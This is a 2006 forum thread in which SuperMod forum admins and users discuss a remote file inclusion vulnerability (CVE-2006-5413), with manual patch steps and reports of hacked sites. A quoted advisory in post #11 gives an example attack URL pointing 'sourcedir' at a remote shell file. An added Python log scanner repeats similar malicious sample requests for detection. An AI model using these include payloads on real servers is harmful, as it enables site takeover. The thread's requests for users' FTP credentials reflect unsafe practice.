#1 By: webmaster Subject: Security Update Action Time: 26.Aug.06 20:18:26
Please be advised that a new exploitable security alert has been posted that may affect different UNIX-based host installations of Supermod. This exploit has not been validated on WIN servers at this time, but I would recommend that you follow these instructions regardless.

Immediate action that you can take to safeguard against this exploit is the following:

Issue:
YabbSE Remote Code Execution Vulnerability

Affects: All released versions of Supermod

Reference:
www.securiteam.com/unixfocus/5...5JP0R2K8US.html

Move the following files into ./Sources:

Reminder.php
News.php
Printpage.php

Open the following file into your favorite text editor:
File: Index.php

Code:

[look for]
'reminder' => array("Reminder.php", ''),
[replace]
'reminder' => array("$sourcedir/Reminder.php", ''),

[look for]
'news' => array("News.php", ''),
[replace]
'news' => array("$sourcedir/News.php", ''),

[look for]
'printpage' => array("Printpage.php", ''),
[replace]
'printpage' => array("$sourcedir/Printpage.php", ''),

[/save and close file]

Open the following file in your favorite text editor:

File: /Sources/News.php

[search for]
global $scripturl, $db_prefix, $txt, $db_name, $db_server, $db_user, $db_passwd, $db_connect, $cgi, $gimagesdir, $imagesdir, $board, $limit, $template, $ext, $locale, $timeformatstring, $yytitle;

[change]
global $dbcon, $boarddir, $scripturl, $db_prefix, $txt, $db_name, $db_server, $db_user, $db_passwd, $db_connect, $cgi, $gimagesdir, $imagesdir, $board, $limit, $template, $ext, $locale, $timeformatstring, $yytitle;

[search for]
// Connect to the database - either pconnect or std - Gxx
if (isset($db_connect) && $db_connect == 1)
{
   $dbcon = mysql_pconnect($db_server, $db_user, $db_passwd) or die(mysql_error());
   mysql_select_db($db_name) or die(mysql_error());
}
else
{
   $dbcon = mysql_connect($db_server, $db_user, $db_passwd) or die(mysql_error());
   mysql_select_db($db_name) or die(mysql_error());
   $db_connect = 0;
}
[/search]

[remove all]

* OR FOR VERSIONS PRIOR TO 3.0*

[search for]
$dbcon = mysql_connect($db_server, $db_user, $db_passwd);
mysql_select_db ($db_name);

[remove all]

Continue, all versions:

[search for]

      include('news_template.php');
   else
   {
      if ($ext == null)
         include($template . '.php');
      else
         include($template . '.' . $ext);
   }
[/search]

[change]
      include("$boarddir/news_template.php");
[/change]

[remove]
   else
   {
      if ($ext == null)
         include($template . '.php');
      else
         include($template . '.' . $ext);
   }
[/remove]

Save file and exit editor.


More information may be posted in the future, please be advised to check this thread for any updates.

SM 5.0 development is in full progress and will contain all necessary and known security corrections when released. If you need assistance to make these changes, please IM me with your FTP account access information and I will assist you.

Little if any code change in News.php has occurred since early releases of SM. With that in mind I have attached the file with these changes in it for your convenience. It may or may not work; if it fails, make sure your news_template.php file is located in the forum root. If it still fails, then follow the above instructions for changing News.php.

Thank you,
Wiziwig.





#2 By: biggs Subject: Re:Security Update Action Time: 28.Aug.06 01:56:21
Link is not working but edits were very easy. Thanks Wiz!


#3 By: avenueb Subject: Security Update Action Time: 28.Aug.06 16:38:35
Thanks for the quick response to this vulnerability.

please clarify from your notes

Code:
[search for]
// Connect to the database - either pconnect or std - Gxx
if (isset($db_connect) && $db_connect == 1)
{
  $dbcon = mysql_pconnect($db_server, $db_user, $db_passwd) or die(mysql_error());
  mysql_select_db($db_name) or die(mysql_error());
}
else
{
  $dbcon = mysql_connect($db_server, $db_user, $db_passwd) or die(mysql_error());
  mysql_select_db($db_name) or die(mysql_error());
  $db_connect = 0;
}
[/search]

[remove all]


We should remove all of these lines of code from News.php?



#4 By: webmaster Subject: Security Update Action Time: 28.Aug.06 20:49:58
Yes, remove those lines of code.


#5 By: Scottb Subject: Re:Security Update Action Time: 28.Aug.06 22:14:29
Thanks for the update, Wiz. I'll spread the word.


#6 By: shak3 Subject: Re:Security Update Action Time: 16.Oct.06 16:20:10
Thanks for the update, my site got hit with an exploit of this kind.


#7 By: Nox Subject: Re:Security Update Action Time: 17.Oct.06 00:32:15
Yeah, I got hit too - and I completely missed this. I bet it's the same thing...


#8 By: sharkey Subject: Security Update Action Time: 20.Oct.06 15:19:40
My board is being attacked also; is the above fix the same as the security vulnerability being reported here:
securitydot.net/xpl/exploits/v...85/exploit.html ??


#9 By: Guardian Subject: Re:Security Update Action Time: 21.Oct.06 04:03:16
Got hit too.


#10 By: AAA Subject: Security Update Action Time: 23.Oct.06 07:23:14
Last week our forum got hit for a second time. This fix was applied but they still got in. Not sure how this time, though.


#11 By: Datarunner Subject: Security Update Action Time: 23.Oct.06 14:50:24
Disable the attachment possibility for now.

I also recommend that you enable "Pre-Approve New User Registrations" (third-last line) under "Modify Supermod Settings" and, if you have a small forum, let in only those you can be sure will not hack. You then have to register the person manually, after disabling the pre-approve new user registration. You would also need phpMyAdmin (secured with a password, hopefully) for reading out the table pre_registration_members and carrying out the registrations manually.
If you find time, inform your users about the pre-registration in the board usage information.

Wiziwig, maybe we can put out a security update? A zip file with the altered php files, so to say a security update with the completely updated files.

This is going through the whole web:

They seem to upload a php file to the attachments path. I am not sure how on my board they could upload a php file although that file extension is disabled. Any ideas???
They then call up the file through Offline.php or similar (see below) and invoke it ...

Quote:

[DESCRIPTION] Remote file include vuln found by sZ [oct 09, 2006]
[SOFTWARE]    Supermod 3.0 for yabb
[VENDOR URL]  http://www.supermod.org
[DORK]        YaBBSM V2.5.0 // Powered by YaBBSM V2.5.0 Based on YABB SE
[NOTES]      greetz to: neo-vortex, sk0tie, icez, Solano College CIS students.


VULN:
Offline.php
include("$sourcedir/pclzip.lib.php");
They forgot to include settings.php, this file seems to not exist sometimes.

VULN:
Sources/Admin.php
include_once("$sourcedir/Recent.php");

VULN:
Sources/Offline.php
include_once("$sourcedir/Recent.php");

VULN:
content/portalshow.php
include_once "$sourcedir/Calendar.php";

[EXAMPLE] site.com/community/Offline.php...?sourcedir=http://shellurl.com/phpcommands.txt?

# ******* [2006-10



#12 By: avenueb Subject: Security Update Action Time: 23.Oct.06 20:40:47
In case anyone is interested

National Cyber-Alert System
Vulnerability Summary CVE-2006-5413
Original release date: 10/20/2006
Last revised: 10/23/2006
Source: US-CERT/NIST

Overview

Multiple PHP remote file inclusion vulnerabilities in SuperMod 3.0.0 for YABB (YaBBSM) allow remote attackers to execute arbitrary PHP code via a URL in the sourcedir parameter to (1) Offline.php, (2) Sources/Admin.php, (3) Sources/Offline.php, or (4) content/portalshow.php.


Impact

CVSS Severity: 7.0 (High)
Range: Remotely exploitable
Authentication: Not required to exploit
Impact Type: Provides unauthorized access


References to Advisories, Solutions, and Tools

External Source: XF

Name: yabbsm-sourcedir-file-include(29559)

Hyperlink: http://xforce.iss.net/xforce/xfdb/29559


External Source: BID

Name: 20570

Hyperlink: http://www.securityfocus.com/bid/20570


External Source: BID

Name: 20568

Hyperlink: http://www.securityfocus.com/bid/20568


External Source: FRSIRT

Name: ADV-2006-4042

Type:  Advisory
Hyperlink: http://www.frsirt.com/english/advisories/2006/4042


External Source: SECUNIA

Name: 22437

Type:  Advisory
Hyperlink: http://secunia.com/advisories/22437


External Source:

Hyperlink: http://milw0rm.com/exploits/2553


Vulnerable software and versions

SuperMod, SuperMod, 3.0.0


Technical Details

CVSS Base Score Vector: (AV:R/AC:L/Au:NR/C:P/I:P/A:P/B:N)

Vulnerability Type: Input Validation Error


CVE Standard Vulnerability Entry:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5413

http://nvd.nist.gov/nvd.cfm?cvename=CVE-2006-5413
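An added example, not from this thread or the SuperMod project: a small Python scanner that flags, in combined-format web-server logs, the request patterns described in the CVE summary above and in the advisory quoted in post #11 (a URL or traversal string handed to the `sourcedir` or `template` include parameter, and a `.php` file being called from the attachments directory). The `/attachments/` directory name, the assumption that `template` is reachable from the query string via register_globals, and the sample log lines are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Query parameters the thread shows reaching include(): $sourcedir (the CVE-2006-5413
# entry points) and $template (the News.php include removed in post #1; assumed to be
# attacker-settable through register_globals).
INCLUDE_PARAMS = {"sourcedir", "template"}
ATTACH_DIR = "/attachments/"  # assumed upload dir name; the thread only says "attachments path"
# Combined-log prefix: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def is_remote_or_traversal(value):
    """True when an include-path value points off-box or outside the forum tree."""
    v = unquote(value).strip().lower()
    return (v.startswith(("http://", "https://", "ftp://", "//", "php://", "data:"))
            or "../" in v or "..\\" in v)

def check_request(target):
    """Return (reason, detail) pairs for one request target; empty when clean."""
    parts = urlsplit(target)
    reasons = []
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name.lower() in INCLUDE_PARAMS:
            reasons += [("include-param", f"{name}={v}") for v in values
                        if is_remote_or_traversal(v)]
    # A .php file served from the upload directory matches the thread's description
    # of a script dropped into the attachments path and then called directly.
    low = parts.path.lower()
    if ATTACH_DIR in low and low.endswith(".php"):
        reasons.append(("php-in-attachments", parts.path))
    return reasons

def scan_log(text):
    """Scan combined-format log text; return one dict per suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and (reasons := check_request(m.group("target"))):
            findings.append({"ip": m.group("ip"), "time": m.group("ts"),
                             "status": int(m.group("status")), "reasons": reasons})
    return findings

# Constructed sample lines, not real traffic; the first mirrors the advisory's example URL.
SAMPLE_LOG = """\
203.0.113.5 - - [23/Oct/2006:07:12:01 +0000] "GET /community/Offline.php?sourcedir=http://shell.example/cmds.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
198.51.100.7 - - [23/Oct/2006:07:12:40 +0000] "GET /community/index.php?board=3 HTTP/1.1" 200 8342 "-" "Mozilla/5.0"
203.0.113.5 - - [23/Oct/2006:07:13:02 +0000] "GET /community/News.php?template=../../attachments/img HTTP/1.1" 200 1024 "-" "Mozilla/4.0"
203.0.113.5 - - [23/Oct/2006:07:14:30 +0000] "POST /community/attachments/x.php HTTP/1.1" 200 77 "-" "Mozilla/4.0"
"""
```

Run `scan_log(SAMPLE_LOG)` against your own access log text to get one record per flagged request; a 200 status on a flagged `sourcedir` request means the include was likely served, not just attempted.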



#13 By: AAA Subject: Security Update Action Time: 24.Oct.06 21:32:52
After over 3 yrs of using and supporting SM, with donations and referrals, we've lost control of our site 3 times now to hackers, in the last 2 months. Two of the times our service provider has had to shut down SM because it was used for UCE and phishing, via SM.

We would like to continue using and supporting SM, but from the looks of it SM has come to a standstill as far as the avg user goes and is wide open for hackers.

Good luck fixing this and thanks for 3 good yrs.


#14 By: Datarunner Subject: Security Update Action Time: 25.Oct.06 12:15:49
AAA,
sad to hear... the development of Supermod has not stopped. It only seems so on this forum.
I am going to program an update for this security vulnerability, so no one can use this hole anymore.
It will be out tomorrow or in 2 days, I hope. It's not really much to be changed.
The National Cyber-Alert System always quotes one security hole; there are no more than 3 or 4 files involved, with a small security hole. Unfortunately we did not receive the news any earlier. And I believe that Wiziwig has done a good job with the first security update, about which he informed and alerted everyone very thoroughly.

Datarunner



#15 By: Datarunner Subject: Security Update Action Time: 25.Oct.06 20:03:39
I have tried some ways to exploit Supermod but it does not seem to work. All this stuff seems to be absolutely nonsense.

AAA, it's a very sad situation. Could you send to me your ftp info, because I have to find out how they did it this time. I hope you keep a backup of your site.

Datarunner



#16 By: AAA Subject: Security Update Action Time: 25.Oct.06 20:59:03
Datarunner, I sent you an IM.

I have no doubt that Wiz did all he could when this first started. I have the utmost respect for his, yours and others' work on SM and hope to see it continue.

The updating on SM has always been a headscratcher for me. I feel much like a caveman trying to do algebra when I look at php. And the possibility of crashing the forum by making a mistake placing or editing any of it isn't something I am comfortable with.


#17 By: Datarunner Subject: Security Update Action Time: 27.Oct.06 16:07:06
You will get a security patch from me, where you only need to overwrite the old files with new ones. It will hopefully be out by the end of this weekend. I will then have to write to several Supermod users to update.

Thanks for the IM information....


Datarunner